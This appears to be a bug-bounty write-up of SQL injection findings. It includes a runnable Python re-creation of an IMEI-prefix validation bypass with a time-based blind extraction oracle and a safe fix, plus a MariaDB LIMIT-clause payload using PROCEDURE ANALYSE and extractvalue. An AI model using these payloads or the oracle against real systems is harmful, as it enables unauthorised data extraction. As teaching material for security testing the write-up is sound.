As of today I passed the half-million milestone on @SynackRedTeam, with 200k of it in the last 90 days. So far this month I'm about to catch the previous one too; we will see what is going to happen in the next 10 days :). #bugbounty #bugbountytips
Almost all my bugs this month were SQLis again. I'll try to give another example from the unique ones.
One of the targets had SQLi on some weird endpoint. It was expecting XML data, but it looks like it was looking for "xml" as the parameter.
I started to send some XML data via it. The application was giving an error for each tag I used, but for one of them it instead gave a "string couldn't be parsed" error.
After that I started to fuzz for attributes and found out IMEI was the one it looked for; however, any value I tried was giving an error again: Invalid IMEI value.
I looked around on the web, located some data sent to the target app, and used the IMEI value from there. The application stopped giving the error, but it looked like it was vulnerable to SQLi on the same param.
What it looked like was that the developer was parsing the first 15 characters and checking whether they were a valid IMEI, then processing the entire payload.
However, this was a fully blind SQLi, so I used time-based payloads and was able to extract data. I hope this will be helpful for all others too, and shows that you should not give up on the target.
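The flaw the thread describes, as an added example that is not code from the original thread or the target: a minimal endpoint re-created on sqlite3 so it runs offline. The XML shape (`<device imei="..."/>`), the `devices` table, the owner rows and the IMEI values are all constructed for this demo, and a `sleep()` user function stands in for MySQL's `SLEEP()` since SQLite has no built-in delay. The vulnerable lookup validates only the first 15 characters (with the Luhn check real IMEIs use) and then concatenates the whole value; the time-based oracle keeps a valid IMEI as the prefix so the check passes, and extracts `sqlite_version()` one character at a time by response time alone. The hardened lookup beside it validates the entire value and binds it.

```python
# Added example (not code from the original thread): a re-creation of the
# "validate the first 15 characters, then use the whole string" bug on sqlite3.
# Everything here (XML shape, table, rows, IMEI values) is constructed for the demo.
import sqlite3
import time
import xml.etree.ElementTree as ET

DELAY = 0.1  # seconds the injected branch sleeps when its condition is true

# Constructed sample IMEI that passes the Luhn check.
VALID_IMEI = "490154203237518"


def luhn_ok(digits: str) -> bool:
    """Luhn checksum as used by IMEIs (the check digit is the last digit)."""
    total = 0
    for pos, ch in enumerate(reversed(digits)):
        d = int(ch)
        if pos % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def valid_imei(s: str) -> bool:
    return len(s) == 15 and s.isdigit() and luhn_ok(s)


def _sleep(seconds: float) -> int:
    """UDF standing in for MySQL SLEEP(): blocks, then returns 0."""
    time.sleep(seconds)
    return 0


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, _sleep)
    conn.execute("CREATE TABLE devices (imei TEXT, owner TEXT)")
    conn.executemany(  # constructed rows; the other two IMEIs are arbitrary digits
        "INSERT INTO devices VALUES (?, ?)",
        [(VALID_IMEI, "alice"), ("356938035643809", "bob"), ("351756051523999", "carol")],
    )
    return conn


def vulnerable_lookup(conn, imei_param: str):
    """The bug: only the first 15 characters are validated, then the whole
    value is concatenated into the query."""
    if not valid_imei(imei_param[:15]):
        raise ValueError("Invalid IMEI value")
    sql = f"SELECT owner FROM devices WHERE imei = '{imei_param}'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, imei_param: str):
    """Fix: validate the entire value, and bind it instead of concatenating."""
    if not valid_imei(imei_param):
        raise ValueError("Invalid IMEI value")
    rows = conn.execute("SELECT owner FROM devices WHERE imei = ?", (imei_param,))
    return [row[0] for row in rows]


def handle_request(conn, xml_body: str, lookup=vulnerable_lookup):
    """Simulated endpoint: reads the imei attribute from the posted XML."""
    imei = ET.fromstring(xml_body).get("imei")
    if imei is None:
        raise ValueError("string couldn't be parsed")
    return lookup(conn, imei)


def request_xml(imei_value: str) -> str:
    # Payloads below use single quotes only, so the double-quoted attribute stays well-formed.
    return f'<device imei="{imei_value}"/>'


def bypass_payload() -> str:
    """Valid IMEI prefix satisfies the check; the tail changes the WHERE clause."""
    return VALID_IMEI + "' OR '1'='1"


def time_oracle(conn, condition: str, delay: float = DELAY) -> bool:
    """Time-based blind oracle. The row comes back either way (CASE ... = 0 is
    always true); only the response time reveals whether `condition` held."""
    injected = (f"{VALID_IMEI}' AND (CASE WHEN {condition} THEN sleep({delay}) "
                f"ELSE 0 END) = 0 AND '1'='1")
    start = time.perf_counter()
    handle_request(conn, request_xml(injected))
    return time.perf_counter() - start >= delay / 2


def extract_version_prefix(conn, n_chars: int) -> str:
    """Recover the first n characters of sqlite_version() with a binary search
    over printable ASCII: 7 timed requests per character."""
    out = ""
    for i in range(1, n_chars + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if time_oracle(conn, f"unicode(substr(sqlite_version(), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = setup_db()
    print(handle_request(db, request_xml(VALID_IMEI)))          # ['alice']
    print(handle_request(db, request_xml(bypass_payload())))    # every owner in the table
    print(extract_version_prefix(db, 3))                        # e.g. '3.4'
    try:
        handle_request(db, request_xml(bypass_payload()), lookup=safe_lookup)
    except ValueError as e:
        print("hardened endpoint:", e)
```

The oracle deliberately makes the injected condition contribute nothing to the result set, so the same row is returned whether or not the branch slept; that is what makes the technique work against an endpoint that otherwise gives no usable output. The threshold of half the sleep time keeps the oracle robust to ordinary query jitter.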
On a recent engagement on a program on @SynackRedTeam, I found out that the target had error-based SQL injection in the LIMIT clause. It appears that the DBMS was MariaDB 10.4.13, so it was limiting the options that could be used in the injection. #bugbountytips #bugbounty 1/5
The only way to exploit the vulnerability was using PROCEDURE ANALYSE on the injection point. However, we were not able to use subqueries inside ANALYSE because it's not allowed. So our options were limited to fetching stuff like database(), user(), etc. 2/5
The payload for the injection was like this: 1+procedure+analyse(extractvalue(rand(),version()),1). However, this will only allow us to retrieve the version of the DBMS, so I then started to check which other functions were available to use within the permissions of the current user. 3/5